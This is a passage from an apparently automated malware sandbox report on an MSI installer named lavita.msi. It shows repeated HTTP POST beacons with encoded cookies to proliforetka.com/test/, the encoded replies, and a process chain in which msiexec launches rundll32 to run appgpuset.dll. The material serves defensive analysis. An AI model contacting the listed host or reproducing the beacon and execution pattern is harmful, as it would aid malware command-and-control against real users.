                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=81429&min_rtt=81133&rtt_var=30636&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1059&delivery_rate=35990&cwnd=32&unsent_bytes=0&cid=237e34785763a190&ts=717&x=0"
                                                                                                                                2024-12-17 16:58:51 UTC343INData Raw: 31 35 30 0d 0a 6c 31 68 74 4a 38 56 4a 75 46 66 78 49 70 77 37 68 6a 56 43 47 33 72 4c 67 65 39 55 71 45 47 7a 47 45 6c 65 67 6e 4c 64 42 67 4c 70 35 65 78 44 4f 50 41 52 79 46 6b 50 62 6e 4f 54 49 58 78 72 39 77 54 54 6a 36 74 45 42 34 58 42 43 45 44 5a 45 68 48 6e 61 79 6e 2f 35 63 75 52 63 41 6e 31 62 62 71 79 53 2f 42 6a 76 35 6e 51 55 36 46 32 53 79 78 63 63 41 2b 35 42 68 57 53 6e 41 4d 64 4b 4c 48 6a 4c 53 47 7a 52 48 36 35 64 45 56 59 6f 44 32 65 55 43 76 44 52 76 58 68 44 34 55 6c 56 50 39 57 36 78 4f 54 4f 30 36 63 38 73 75 6e 4f 6b 4f 6f 50 37 52 47 78 43 75 49 59 76 67 6f 51 38 59 62 77 74 6d 6d 75 58 63 64 78 39 76 45 55 65 57 51 7a 4b 4a 48 6b 6a 58 6a 45 62 37 37 50 72 76 66 61 35 63 67 33 74 52 67 5a 55 4a 4c 68 44 32 47 45 57 67 33 4d 50
                                                                                                                                Data Ascii: 150l1htJ8VJuFfxIpw7hjVCG3rLge9UqEGzGElegnLdBgLp5exDOPARyFkPbnOTIXxr9wTTj6tEB4XBCEDZEhHnayn/5cuRcAn1bbqyS/Bjv5nQU6F2SyxccA+5BhWSnAMdKLHjLSGzRH65dEVYoD2eUCvDRvXhD4UlVP9W6xOTO06c8sunOkOoP7RGxCuIYvgoQ8YbwtmmuXcdx9vEUeWQzKJHkjXjEb77Prvfa5cg3tRgZUJLhD2GEWg3MP
                                                                                                                                2024-12-17 16:58:51 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                47192.168.2.650043172.67.161.60443
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:58:52 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DXxIIJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:58:53 UTC813INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:53 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3HZ%2FKdkz7%2BJqywmVElBXN3XgfMitbwwTayFUbbw1WkAs7EmrZ98QLCUqnHPLfqifjubI7%2BB%2FLJQ7dVIdivpSkiAVF3j8hitj0f8neoxZmk7eyFkw1UKUNI8zfo%2FXLju8BKtL"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3875e1cbe641ac-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1588&min_rtt=1584&rtt_var=602&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1059&delivery_rate=1806930&cwnd=252&unsent_bytes=0&cid=cc9d80e8feb4af69&ts=742&x=0"
                                                                                                                                2024-12-17 16:58:53 UTC347INData Raw: 31 35 34 0d 0a 6e 46 78 6f 49 73 56 4e 31 54 7a 79 4c 4a 59 79 68 6a 45 50 56 6e 37 43 68 65 74 52 71 69 66 61 48 6b 52 62 68 33 50 56 53 58 50 75 72 4f 4e 4b 50 4f 4d 57 7a 30 64 4f 61 55 69 59 4a 58 70 72 39 41 53 34 34 61 68 46 41 6f 66 4a 44 41 2b 58 48 68 48 6d 5a 43 44 2f 6a 36 57 64 65 67 48 34 61 4c 75 79 53 2f 42 6a 76 35 6e 51 55 36 46 32 53 79 78 63 63 41 2b 35 42 68 57 53 6e 41 4d 64 4b 4c 48 6a 4c 53 47 7a 52 48 36 35 64 45 56 59 6f 44 32 65 55 43 76 50 51 2f 72 6b 41 59 49 69 56 50 4a 63 34 42 43 53 4d 55 32 63 2f 63 79 6e 50 30 75 6b 50 4c 52 46 77 53 32 49 61 2f 6c 73 4d 73 46 45 78 63 65 35 6c 6a 70 51 30 38 66 45 56 65 62 5a 32 61 49 59 6b 43 6a 67 46 4c 48 79 49 36 7a 4f 64 4a 31 76 6b 39 68 69 4a 78 6c 61 6b 6a 72 64 4d 32 38 49 4d 50
                                                                                                                                Data Ascii: 154nFxoIsVN1TzyLJYyhjEPVn7ChetRqifaHkRbh3PVSXPurONKPOMWz0dOaUiYJXpr9AS44ahFAofJDA+XHhHmZCD/j6WdegH4aLuyS/Bjv5nQU6F2SyxccA+5BhWSnAMdKLHjLSGzRH65dEVYoD2eUCvPQ/rkAYIiVPJc4BCSMU2c/cynP0ukPLRFwS2Ia/lsMsFExce5ljpQ08fEVebZ2aIYkCjgFLHyI6zOdJ1vk9hiJxlakjrdM28IMP
                                                                                                                                2024-12-17 16:58:53 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                48192.168.2.650044172.67.161.60443
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:58:55 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DXxIYJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:58:55 UTC809INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:55 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8QrVhqzFWHIfqplElsqyywQSW%2BPIsMgZoPMj%2FOHURiWCS5IfPngX7qi7PdXmu3m2AkmeCuBSEBT0il%2FVmckzPTe2c8eD6gqKDSNcFHl5aPO1QkEfuYLgiGo2roVdDABmrFKe"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3875f04d5c440e-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2471&min_rtt=2441&rtt_var=976&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1059&delivery_rate=1087928&cwnd=234&unsent_bytes=0&cid=631dfd53d59250e4&ts=795&x=0"
                                                                                                                                2024-12-17 16:58:55 UTC347INData Raw: 31 35 34 0d 0a 6d 56 4e 6f 4a 38 70 45 73 6c 66 30 49 4a 30 79 68 7a 46 4c 47 33 72 4b 67 75 74 54 6f 45 32 7a 48 55 46 57 68 6e 48 56 42 41 4c 70 35 65 78 44 4f 50 41 52 79 46 6b 50 62 6e 4f 58 4a 6e 35 6f 39 41 44 58 6a 36 6c 44 44 34 58 42 42 6b 66 5a 48 78 48 6d 59 69 72 39 34 73 75 61 65 67 2f 2f 61 4c 4c 33 4f 76 63 38 75 49 66 50 66 4f 30 36 58 7a 42 63 64 41 7a 77 45 78 58 5a 6c 77 73 54 4d 36 4c 6b 4c 6a 62 76 43 58 4b 37 4e 68 35 4a 74 6a 72 46 63 69 7a 39 52 66 76 6b 41 59 59 6a 4f 5a 56 63 36 52 43 58 4e 55 6a 53 74 73 6d 6f 4e 6b 79 6d 50 39 73 74 77 69 75 4d 62 76 78 74 65 37 42 44 6d 73 43 6e 69 52 55 64 6e 74 50 59 56 65 4c 61 6b 4c 63 59 7a 79 72 39 46 37 54 39 4b 72 48 5a 5a 59 4a 6c 33 4a 56 75 4a 56 73 42 67 79 7a 61 61 45 30 50 44 2f
                                                                                                                                Data Ascii: 154mVNoJ8pEslf0IJ0yhzFLG3rKgutToE2zHUFWhnHVBALp5exDOPARyFkPbnOXJn5o9ADXj6lDD4XBBkfZHxHmYir94suaeg//aLL3Ovc8uIfPfO06XzBcdAzwExXZlwsTM6LkLjbvCXK7Nh5JtjrFciz9RfvkAYYjOZVc6RCXNUjStsmoNkymP9stwiuMbvxte7BDmsCniRUdntPYVeLakLcYzyr9F7T9KrHZZYJl3JVuJVsBgyzaaE0PD/
                                                                                                                                2024-12-17 16:58:55 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                49192.168.2.650045172.67.161.60443
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:58:57 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DXxIoJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:58:57 UTC813INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:58:57 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=AWjM448HvKQyn8XMhzb62h6eE9v7I4eLBVo2ms6y45BvqnW1lIk%2BW8k%2BtMf%2BcS4qEyk8K5KDZ75xZQu7AV%2Femk3lUT79D5dIFj%2FsT69DT7lLNf7TJQaAViR9BRPmVzq8EKh0"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f3875fd783042b8-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1672&min_rtt=1658&rtt_var=632&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2838&recv_bytes=1059&delivery_rate=1761158&cwnd=232&unsent_bytes=0&cid=8aa973b828153a61&ts=761&x=0"
                                                                                                                                2024-12-17 16:58:57 UTC343INData Raw: 31 35 30 0d 0a 6d 31 35 70 4a 63 64 46 76 46 66 39 4c 4a 49 79 67 54 4a 4c 47 33 44 4b 68 75 68 51 78 6b 37 56 47 6b 42 5a 67 58 57 51 4f 48 53 6e 6f 2b 70 4f 4c 2b 51 52 30 51 5a 4a 56 55 43 55 49 33 70 6f 38 6d 6e 56 34 36 6c 46 41 6f 44 47 51 6b 53 54 48 78 6a 6a 59 43 75 54 34 61 57 59 63 41 33 2b 62 66 2f 44 54 4b 39 6b 6f 59 62 2f 48 2b 31 69 56 79 78 59 63 30 61 73 42 6c 36 5a 6c 41 30 47 4f 37 62 67 4f 6e 33 2b 53 48 7a 37 4c 31 52 4f 70 32 61 38 56 78 62 50 51 2f 48 67 44 6f 46 50 50 50 78 57 36 78 4b 61 4d 51 58 54 38 73 71 74 4f 45 71 69 56 4e 4e 4b 77 53 43 45 61 2f 38 6f 51 38 59 62 77 74 6d 6d 75 58 63 64 78 39 76 45 55 65 57 51 7a 4b 4a 48 6b 6a 58 6a 45 62 37 37 50 72 76 66 61 35 63 67 33 74 52 67 5a 55 4a 4c 68 44 32 47 45 57 67 30 4d 2f
                                                                                                                                Data Ascii: 150m15pJcdFvFf9LJIygTJLG3DKhuhQxk7VGkBZgXWQOHSno+pOL+QR0QZJVUCUI3po8mnV46lFAoDGQkSTHxjjYCuT4aWYcA3+bf/DTK9koYb/H+1iVyxYc0asBl6ZlA0GO7bgOn3+SHz7L1ROp2a8VxbPQ/HgDoFPPPxW6xKaMQXT8sqtOEqiVNNKwSCEa/8oQ8YbwtmmuXcdx9vEUeWQzKJHkjXjEb77Prvfa5cg3tRgZUJLhD2GEWg0M/
                                                                                                                                2024-12-17 16:58:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                50192.168.2.650046172.67.161.60443
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:58:59 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DXxI4J2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:59:00 UTC813INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:59:00 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4%2BKIT3JoIoNqUFNSqIVb7nU3FAo4lfyVfbVi5Q6AmcjZ6TGHGvlAC8V0XghSlbkgFYL%2B%2BKQ%2Fmss0dEJ9xYFWSDfZyQ4UN0NZLzXFyPdGSB9e%2F8k88bQ89VFqDYy9zprjFLkb"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f38760d3df40cac-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=1746&min_rtt=1745&rtt_var=658&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1059&delivery_rate=1660034&cwnd=232&unsent_bytes=0&cid=aa7114fbc9b5620c&ts=990&x=0"
                                                                                                                                2024-12-17 16:59:00 UTC343INData Raw: 31 35 30 0d 0a 6d 46 70 76 49 38 5a 4e 75 56 66 39 49 4a 77 7a 67 6a 42 47 47 33 7a 50 68 75 70 51 72 55 79 7a 48 30 56 66 67 6e 4c 65 41 41 4c 70 35 65 78 44 4f 50 41 52 79 46 6b 50 62 6e 4f 54 4c 33 6c 67 38 67 4c 58 6a 36 64 4f 41 59 48 49 43 41 2b 51 48 78 44 6c 5a 53 48 38 6a 36 61 66 63 41 6a 35 59 66 2f 44 54 4b 39 6b 6f 59 62 2f 48 2b 31 69 56 79 78 59 63 30 61 73 42 6c 36 5a 6c 41 30 47 4f 37 62 67 4f 6e 33 2b 53 48 7a 37 4c 31 52 4f 70 32 61 38 56 78 54 45 54 50 44 67 41 6f 46 50 4f 50 74 64 37 68 4b 56 4f 77 58 56 2b 4d 4f 73 4f 6b 32 6c 56 4e 31 41 78 43 6d 4b 62 76 77 6f 51 38 59 62 77 74 6d 6d 75 58 63 64 78 39 76 45 55 65 57 51 7a 4b 4a 48 6b 6a 58 6a 45 62 37 37 50 72 76 66 61 35 63 67 33 74 52 67 5a 55 4a 4c 68 44 32 47 45 57 67 31 4d 66
                                                                                                                                Data Ascii: 150mFpvI8ZNuVf9IJwzgjBGG3zPhupQrUyzH0VfgnLeAALp5exDOPARyFkPbnOTL3lg8gLXj6dOAYHICA+QHxDlZSH8j6afcAj5Yf/DTK9koYb/H+1iVyxYc0asBl6ZlA0GO7bgOn3+SHz7L1ROp2a8VxTETPDgAoFPOPtd7hKVOwXV+MOsOk2lVN1AxCmKbvwoQ8YbwtmmuXcdx9vEUeWQzKJHkjXjEb77Prvfa5cg3tRgZUJLhD2GEWg1Mf
                                                                                                                                2024-12-17 16:59:00 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                51192.168.2.650047172.67.161.60443
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:59:02 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DXxLIJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:59:03 UTC810INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:59:03 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=D1vBui2Ycb6gZjEw71amGY9x%2B7ez8yg68JdxgdeO%2FkW51knIxV0FFg4s13ua9Wmkv5FN8G71VvyNy9Xhb6dfE8AYvO%2FYa95kQ0dEGmJtIN4RKd7sERka1HfDlzl7e7SsiBXf"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f38761f0ce3d146-CDG
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=81073&min_rtt=81061&rtt_var=30406&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1059&delivery_rate=36022&cwnd=32&unsent_bytes=0&cid=478924a3f797edb0&ts=690&x=0"
                                                                                                                                2024-12-17 16:59:03 UTC343INData Raw: 31 35 30 0d 0a 6e 56 68 74 4a 38 64 46 75 56 66 39 49 35 4d 79 67 7a 70 44 47 33 48 4d 69 65 6c 55 72 55 79 7a 47 6b 5a 59 68 6e 50 62 41 41 4c 70 35 65 78 44 4f 50 41 52 79 46 6b 50 62 6e 4f 59 49 48 35 67 38 77 4c 55 6a 36 6c 43 41 6f 44 4a 44 45 66 5a 45 78 6a 69 5a 53 48 39 36 4d 75 5a 65 77 76 31 61 62 44 32 4f 76 63 38 75 49 66 50 66 4f 30 36 58 7a 42 63 64 41 7a 77 45 78 58 5a 6c 77 73 54 4d 36 4c 6b 4c 6a 62 76 43 58 4b 37 4e 68 35 4a 74 6a 72 46 63 69 7a 39 51 50 62 73 41 34 4d 6f 50 5a 56 54 37 42 47 57 4e 30 44 57 74 73 4f 71 50 6b 36 6c 4d 39 77 74 78 69 71 4f 59 76 64 67 4d 73 46 45 78 63 65 35 6c 6a 70 51 30 38 66 45 56 65 62 5a 32 61 49 59 6b 43 6a 67 46 4c 48 79 49 36 7a 4f 64 4a 31 76 6b 39 68 69 4a 78 6c 61 6b 6a 72 64 4d 32 38 49 4d 66
                                                                                                                                Data Ascii: 150nVhtJ8dFuVf9I5MygzpDG3HMielUrUyzGkZYhnPbAALp5exDOPARyFkPbnOYIH5g8wLUj6lCAoDJDEfZExjiZSH96MuZewv1abD2Ovc8uIfPfO06XzBcdAzwExXZlwsTM6LkLjbvCXK7Nh5JtjrFciz9QPbsA4MoPZVT7BGWN0DWtsOqPk6lM9wtxiqOYvdgMsFExce5ljpQ08fEVebZ2aIYkCjgFLHyI6zOdJ1vk9hiJxlakjrdM28IMf
                                                                                                                                2024-12-17 16:59:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                52192.168.2.650048172.67.161.60443
                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                2024-12-17 16:59:04 UTC421OUTPOST /test/ HTTP/1.1
                                                                                                                                Accept: */*
                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                Cookie: zQQrf4YZ+DXxLYJ2yHMWWnnc168N/UXeGENc8HXeBT3Q3Z1JSYd3rD9zV0qUV31t8QLT9vEEC4XXXwHGQhzjdGy/tebGKFSpZOagIZNYiLDxCfZ4TC1YPU+wGQzBx1BMbuKjPjbvGiD6YxdIo3SJe0WeBqe2Qtx/ZfcUq0jOax+PuJ/rZRq/aIQf
                                                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                                                Host: proliforetka.com
                                                                                                                                Content-Length: 0
                                                                                                                                Cache-Control: no-cache
                                                                                                                                2024-12-17 16:59:05 UTC810INHTTP/1.1 200 OK
                                                                                                                                Date: Tue, 17 Dec 2024 16:59:05 GMT
                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                Connection: close
                                                                                                                                cf-cache-status: DYNAMIC
                                                                                                                                vary: accept-encoding
                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jL0AD37WEpCBfYrUN7V8vpVHto65oJXy3mieQppHIfnsg7sWNp909Xc8Zs%2Bnm5LqTXQUvj7AgIm5brHX1oLcwZEltcOPSSKJX0hX%2FKRIUS%2BTOG7LTJs2xt6H88aTdCHG7P%2Fo"}],"group":"cf-nel","max_age":604800}
                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                Server: cloudflare
                                                                                                                                CF-RAY: 8f38762bad3a4344-EWR
                                                                                                                                alt-svc: h3=":443"; ma=86400
                                                                                                                                server-timing: cfL4;desc="?proto=TCP&rtt=2758&min_rtt=2537&rtt_var=1395&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1059&delivery_rate=677337&cwnd=47&unsent_bytes=0&cid=02a64513c199cd20&ts=697&x=0"
                                                                                                                                2024-12-17 16:59:05 UTC347INData Raw: 31 35 34 0d 0a 6d 31 70 71 4a 38 74 4a 75 56 66 77 4a 4a 30 37 68 44 73 50 55 6e 44 4a 69 65 31 56 72 69 66 59 48 55 64 66 68 33 4c 64 53 58 50 75 72 4f 4e 4b 50 4f 4d 57 7a 30 64 4f 61 55 43 54 4a 33 6c 67 39 51 2b 34 36 4b 70 44 42 49 58 44 44 67 2b 54 48 78 4c 6b 59 43 72 39 6a 36 43 5a 65 41 44 2b 59 4c 43 79 53 2f 42 6a 76 35 6e 51 55 36 46 32 53 79 78 63 63 41 2b 35 42 68 57 53 6e 41 4d 64 4b 4c 48 6a 4c 53 47 7a 52 48 36 35 64 45 56 59 6f 44 32 65 55 43 76 50 51 76 54 74 42 49 77 67 56 50 68 63 37 68 4f 61 4d 6b 47 63 2f 73 32 70 4f 55 71 67 50 37 52 44 78 53 32 4a 59 2f 31 73 4d 73 46 45 78 63 65 35 6c 6a 70 51 30 38 66 45 56 65 62 5a 32 61 49 59 6b 43 6a 67 46 4c 48 79 49 36 7a 4f 64 4a 31 76 6b 39 68 69 4a 78 6c 61 6b 6a 72 64 4d 32 38 49 4e 50
                                                                                                                                Data Ascii: 154m1pqJ8tJuVfwJJ07hDsPUnDJie1VrifYHUdfh3LdSXPurONKPOMWz0dOaUCTJ3lg9Q+46KpDBIXDDg+THxLkYCr9j6CZeAD+YLCyS/Bjv5nQU6F2SyxccA+5BhWSnAMdKLHjLSGzRH65dEVYoD2eUCvPQvTtBIwgVPhc7hOaMkGc/s2pOUqgP7RDxS2JY/1sMsFExce5ljpQ08fEVebZ2aIYkCjgFLHyI6zOdJ1vk9hiJxlakjrdM28INP
                                                                                                                                2024-12-17 16:59:05 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                Data Ascii: 0


                                                                                                                                Statistics

                                                                                                                                CPU Usage

                                                                                                                                Click to jump to process

                                                                                                                                Memory Usage

                                                                                                                                Click to jump to process

                                                                                                                                High Level Behavior Distribution

                                                                                                                                Click to dive into process behavior distribution

                                                                                                                                Behavior

                                                                                                                                Click to jump to process

                                                                                                                                System Behavior

                                                                                                                                General

                                                                                                                                Target ID:0
                                                                                                                                Start time:11:54:59
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\msiexec.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:"C:\Windows\System32\msiexec.exe" /i "C:\Users\user\Desktop\lavita.msi"
                                                                                                                                Imagebase:0x7ff7d6030000
                                                                                                                                File size:69'632 bytes
                                                                                                                                MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:2
                                                                                                                                Start time:11:55:00
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\msiexec.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:\Windows\system32\msiexec.exe /V
                                                                                                                                Imagebase:0x7ff7d6030000
                                                                                                                                File size:69'632 bytes
                                                                                                                                MD5 hash:E5DA170027542E25EDE42FC54C929077
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:false

                                                                                                                                General

                                                                                                                                Target ID:3
                                                                                                                                Start time:11:55:00
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                Wow64 process (32bit):true
                                                                                                                                Commandline:C:\Windows\syswow64\MsiExec.exe -Embedding 50018695A6192D85B7480687F9E151A9
                                                                                                                                Imagebase:0xfc0000
                                                                                                                                File size:59'904 bytes
                                                                                                                                MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Reputation:high
                                                                                                                                Has exited:true

                                                                                                                                General

                                                                                                                                Target ID:4
                                                                                                                                Start time:11:55:01
                                                                                                                                Start date:17/12/2024
                                                                                                                                Path:C:\Windows\System32\rundll32.exe
                                                                                                                                Wow64 process (32bit):false
                                                                                                                                Commandline:C:/Windows/System32/rundll32.exe appgpuset.dll, GfeXcodeFunc
                                                                                                                                Imagebase:0x7ff62c070000
                                                                                                                                File size:71'680 bytes
                                                                                                                                MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                                                                                                Has elevated privileges:true
                                                                                                                                Has administrator privileges:true
                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                Yara matches:
